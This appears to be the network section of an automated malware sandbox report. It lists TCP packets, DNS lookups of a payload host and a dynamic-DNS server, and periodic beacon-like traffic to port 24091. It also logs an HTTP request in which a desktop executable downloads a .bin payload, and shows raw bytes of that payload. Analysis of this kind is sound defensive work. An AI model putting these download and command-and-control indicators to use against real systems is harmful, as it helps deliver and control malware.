Oct 14, 2021 08:40:55.874475002 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874520063 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874564886 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874609947 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874764919 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874763966 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.874803066 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.874814034 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874861002 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874939919 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.874953032 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.874979019 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.874989033 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875003099 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875047922 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875092983 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875117064 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875139952 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875226974 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875272989 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875297070 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875319004 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875335932 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875345945 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875355005 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875363111 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875365973 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875411987 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875457048 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875474930 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875502110 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875547886 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875592947 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875637054 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875653982 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875682116 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875693083 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875703096 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875711918 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875720024 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875729084 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875729084 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875775099 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875818968 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875833035 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875864029 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875871897 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875911951 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875952959 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.875957966 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.875963926 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876004934 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876051903 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876096964 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876128912 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876140118 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876142025 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876147985 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876157999 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876166105 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876188993 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876234055 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876280069 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876307011 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876317978 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876324892 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876372099 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876416922 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876461983 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876483917 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876493931 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876502037 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876507998 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876511097 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876553059 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876597881 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876641989 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876687050 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876708984 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876733065 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876749039 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876759052 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876766920 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876776934 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876780033 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876827002 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876871109 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876888037 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876916885 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.876925945 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.876964092 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.877007961 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.877053976 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.877067089 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877099037 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.877105951 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877145052 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.877249002 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877288103 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877298117 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877305984 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877314091 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877422094 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.877459049 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.897902012 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.897970915 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898134947 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898148060 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.898183107 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898188114 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.898230076 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898274899 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898319006 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898430109 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.898468971 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.898509979 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898555994 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898607016 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.898616076 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898663998 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898709059 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898752928 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898783922 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.898797989 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898844957 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898906946 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898952961 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.898962021 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.898998022 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899002075 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899043083 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899087906 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899132013 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899138927 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899177074 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899178028 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899188995 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899197102 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899204969 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899223089 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899267912 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899315119 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899316072 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899353981 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899359941 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899364948 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899405956 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899451017 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899492979 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899496078 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899532080 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899542093 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899543047 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899590015 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899626017 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899636030 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899636984 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899646997 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899682999 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899682999 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899729013 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899775028 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899804115 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.899820089 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899866104 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899910927 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899955988 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.899982929 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900001049 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.900002956 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900013924 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900022984 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900048018 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.900094032 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.900139093 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.900156975 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900166988 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900175095 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900183916 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.900230885 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.900276899 CEST	80	49811	83.167.224.147	192.168.11.20
Oct 14, 2021 08:40:55.900332928 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900365114 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900511980 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900685072 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:55.900695086 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:40:56.852936983 CEST	49811	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:41:14.339595079 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:41:14.341803074 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:41:14.551204920 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:41:34.364437103 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:41:34.366044044 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:41:34.564233065 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:41:54.388705969 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:41:54.390285015 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:41:54.603224039 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:42:14.409532070 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:42:14.411174059 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:42:14.621196985 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:42:21.848093987 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:42:22.159868002 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:42:22.769270897 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:42:23.972059011 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:42:26.377681971 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:42:31.189301014 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:42:34.433446884 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:42:34.435678005 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:42:34.643239021 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:42:40.796536922 CEST	49808	80	192.168.11.20	83.167.224.147
Oct 14, 2021 08:42:54.457360029 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:42:54.459693909 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:42:54.666183949 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:43:14.481362104 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:43:14.483602047 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:43:14.687220097 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:43:34.505498886 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:43:34.507091999 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:43:34.712205887 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:43:54.530316114 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:43:54.532013893 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:43:54.737109900 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:44:14.554130077 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:44:14.555752993 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:44:14.760989904 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:44:34.618061066 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:44:34.619662046 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:44:34.825994968 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:44:54.643419027 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:44:54.644953966 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:44:54.845866919 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:45:14.667280912 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:45:14.669647932 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:45:14.880918026 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:45:34.691098928 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:45:34.693176985 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:45:34.897969007 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:45:54.715231895 CEST	24091	49809	8.6.8.23	192.168.11.20
Oct 14, 2021 08:45:54.716860056 CEST	49809	24091	192.168.11.20	8.6.8.23
Oct 14, 2021 08:45:54.916878939 CEST	24091	49809	8.6.8.23	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 14, 2021 08:38:58.541471004 CEST	56779	53	192.168.11.20	1.1.1.1
Oct 14, 2021 08:38:58.556871891 CEST	53	56779	1.1.1.1	192.168.11.20
Oct 14, 2021 08:40:32.070306063 CEST	61288	53	192.168.11.20	1.1.1.1
Oct 14, 2021 08:40:32.224752903 CEST	53	61288	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 14, 2021 08:38:58.541471004 CEST	192.168.11.20	1.1.1.1	0x6ec8	Standard query (0)	implantecapilarpereira.com	A (IP address)	IN (0x0001)
Oct 14, 2021 08:40:32.070306063 CEST	192.168.11.20	1.1.1.1	0x7e78	Standard query (0)	Venonletmonitprradministratioran.loseyourip.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 14, 2021 08:38:58.556871891 CEST	1.1.1.1	192.168.11.20	0x6ec8	No error (0)	implantecapilarpereira.com		83.167.224.147	A (IP address)	IN (0x0001)
Oct 14, 2021 08:40:32.224752903 CEST	1.1.1.1	192.168.11.20	0x7e78	No error (0)	Venonletmonitprradministratioran.loseyourip.com		8.6.8.23	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

implantecapilarpereira.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.11.20	49804	83.167.224.147	80	C:\Users\user\Desktop\mU9H96igb3.exe

Timestamp	kBytes transferred	Direction	Data
Oct 14, 2021 08:38:58.586767912 CEST	6297	OUT	GET /NetGeneration10%20Startup_KCFPCd130.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: implantecapilarpereira.com Cache-Control: no-cache
Oct 14, 2021 08:38:58.608710051 CEST	6299	IN	HTTP/1.1 200 OK Date: Thu, 14 Oct 2021 06:38:58 GMT Server: Apache Last-Modified: Wed, 13 Oct 2021 14:14:17 GMT Accept-Ranges: bytes Content-Length: 470592 Content-Type: application/octet-stream Data Raw: 0c 8d eb eb 31 58 14 5e 5c 4a 0e a8 9f a5 08 3f 56 7c 97 42 71 30 48 0c ab 52 7d 99 99 e0 3d ef cc 2b 96 6c 96 b7 11 05 bd 89 e3 b9 f9 0d ad 44 dd a4 e4 f0 f4 d0 42 90 3e 9b a6 de e6 4d fb ce a4 02 80 7a b6 00 5e 79 5c 99 e0 f1 bb f5 73 cb 38 71 04 72 b9 e3 3c 5c 47 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 47 ce 96 d0 c1 de 44 4e 38 6b d7 6f 9f 05 7f 51 a0 b0 51 8b 8c 3c 4b a8 46 c0 90 71 f4 fc 14 27 c7 54 6a 7e b8 0a 54 64 15 ee d0 ea b2 53 5c 38 a6 a3 44 51 1e eb 9d bc df 68 f3 c3 57 ad 42 bc 69 2b 17 df 26 db b3 06 85 63 e4 69 c3 ea 73 46 a7 df b2 b1 d1 28 37 eb e1 4f 92 25 e6 0b d2 40 c8 57 79 92 30 8f 30 7f a9 5b 87 4a dd a5 cb 1d 1b 49 ae 98 83 51 d0 22 ab 30 52 10 ba 6a 18 3d f7 6b 53 e6 a9 11 57 c4 e4 e3 83 22 e9 4c 07 9c e0 87 87 2e 0d 1b ff 13 1c ae 7d 99 e4 66 9b 06 b1 7c e2 ff 46 33 7c fa 25 9f aa b6 d9 59 d8 55 14 93 37 51 3b bf e8 4d c4 45 25 e8 86 75 88 4d 57 80 38 9d d9 8f a6 7d 04 78 c3 3e 3f 7a ba df ab 31 b3 4b dc 58 0a ab 00 ab 64 f8 9f 96 40 b4 ba 49 ee f1 96 f2 cb dd 14 1b 77 4e cc 24 a2 9c f8 83 df 4f 32 bf 04 61 43 97 08 92 b5 ea 8f 18 1c 49 4b d1 42 67 93 98 71 dd a4 d6 f2 8b 17 fb 9e 00 96 97 9e 1b a1 ac 02 e9 94 84 ff d8 d1 ce 22 dc 0d 1b a2 21 26 90 4c 10 2f 8a 00 e8 24 89 86 34 56 11 0b b2 3b fd a8 18 0e a6 5c 77 77 14 66 6c 34 d5 6d 11 d6 85 27 58 2c 4c 51 2b e9 bd 0b 03 76 2f 83 4e 9d 21 99 8d 0b be b5 e5 ec ee 6b 29 df 60 93 e8 9e 6c 3e db e4 c7 36 d3 8e 38 02 34 ec b2 26 48 c1 0b 5d f9 5b 8b 07 81 34 21 f3 46 33 eb 04 0e 77 0b 8e 60 ac 61 c2 fd 71 da 47 99 3c 42 38 53 fd 9f 9f b9 7b 78 08 c7 8d 44 1b fe 34 6f 3d f9 01 c1 96 62 ae b9 da 4b f2 ae d8 2b a5 50 5c ec f9 52 fe 33 86 c7 e8 e2 4a eb 27 f7 90 da dc 4d 96 ae 61 0b bf 7d 48 55 28 68 e1 5e ec c1 84 9c b2 83 e5 d9 8b 48 cc dc 9c c4 f7 e5 68 d5 f0 c9 df 04 50 c9 1e cd 8a 60 f1 30 7b 49 27 83 0a 82 23 8f 99 70 ab 1d 06 29 66 60 94 67 19 b3 e6 b4 4e 57 5c 95 7d 77 db cb d6 9d 0b d4 07 c0 9d ee ad 89 51 b3 51 fe 43 4f 09 c8 4b e6 f7 52 fb ee 83 ba bb b9 d7 32 47 1e 6b e5 90 01 46 c2 b6 69 c7 14 db af ac f9 38 54 04 84 fb ee cd fe 6a b7 92 b5 25 2e 90 cf 59 fc c9 c4 12 bc cd d1 4f 8e 4c 92 58 c3 6c 25 91 4a 00 26 15 c1 e5 6a e3 eb 65 02 b8 6e 28 85 9b ad cc f8 ea ac ab 2d b5 37 02 80 9b 77 84 11 78 33 0d 7b 50 7d eb 81 b5 0b 42 19 8e 39 dd d0 15 51 54 da d1 2e c9 aa 59 21 9d 05 07 69 b8 f7 5a 7b 75 8b 22 a3 68 27 72 38 3f e0 7a 86 c4 fa 86 aa c5 78 c1 be 75 40 e3 81 d0 a1 c4 c0 ec 90 21 82 e4 84 26 e9 a0 af bc b1 9e 2e 6d ba 60 b3 7b 9b 52 cd 6e 30 af 8a 57 b9 45 ec 10 02 90 f6 2a e6 e5 49 5f d8 96 4b 12 42 cd c1 00 60 73 82 92 a2 ba 44 fd a2 11 42 ee 59 5a 5d ae 8d 08 21 89 62 92 3c da 37 fb ab 20 d4 a7 39 92 0b 0d 32 a5 6e 0b 1b b1 e9 58 10 7a b5 00 5e 79 58 99 e0 f1 44 0a 73 cb 80 71 04 72 b9 e3 3c 5c 07 83 42 ac 3e 4b f9 01 45 c9 0a 16 58 ed 87 dc 55 b4 3a 91 a5 33 11 bc db d2 c2 b7 af 82 4d 75 e9 e2 7b 99 57 cf 96 d0 cf c1 fe 40 38 df de a2 be bd 7e 1d 6d 91 05 e3 e5 4f 6b d8 34 af f7 03 95 91 34 44 a6 3a 04 11 cc 2a 36 01 35 9c a5 84 92 3a 32 18 e2 ec 17 71 73 84 f9 d9 f1 65 fe c9 73 ad 42 bc 69 2b 17 df 8c d8 f3 36 6b 01 ca 0a 2d 88 5d 25 49 bd 9c d2 8b d6 e8 88 1d 2d bc 46 bc f5 0f 23 87 35 57 f1 6a 71 ec 1c 59 39 a9 29 3a bf 61 7e f4 2b 80 fb f3 93 39 f8 97 92 3a 73 87 35 3a 5f 03 61 2a a9 39 2d 94 00 d9 83 ad 18 ff c9 c5 3e 6a e5 41 f8 fa 01 42 18 86 e0 16 fa e2 94 5d 67 7e 46 0f 25 3b Data Ascii: 1X^\J?V\|Bq0HR}=+lDB>Mz^y\s8qr<\GB>KEXU:3Mu{GDN8koQQ<KFq'Tj~TdS\8DQhWBi+&cisF(7O%@Wy00[JIQ"0Rj=kSW"L.}f\|F3\|%YU7Q;ME%uMW8}x>?z1KXd@IwN$O2aCIKBgq"!&L/$4V;\wwfl4m'X,LQ+v/N!k)`l>684&H][4!F3w`aqG<B8S{xD4o=bK+P\R3J'Ma}HU(h^HhP`0{I'#p)f`gNW\}wQQCOKR2GkFi8Tj%.YOLXl%J&jen(-7wx3{P}B9QT.Y!iZ{u"h'r8?zxu@!&.m`{Rn0WEI_KB`sDBYZ]!b<7 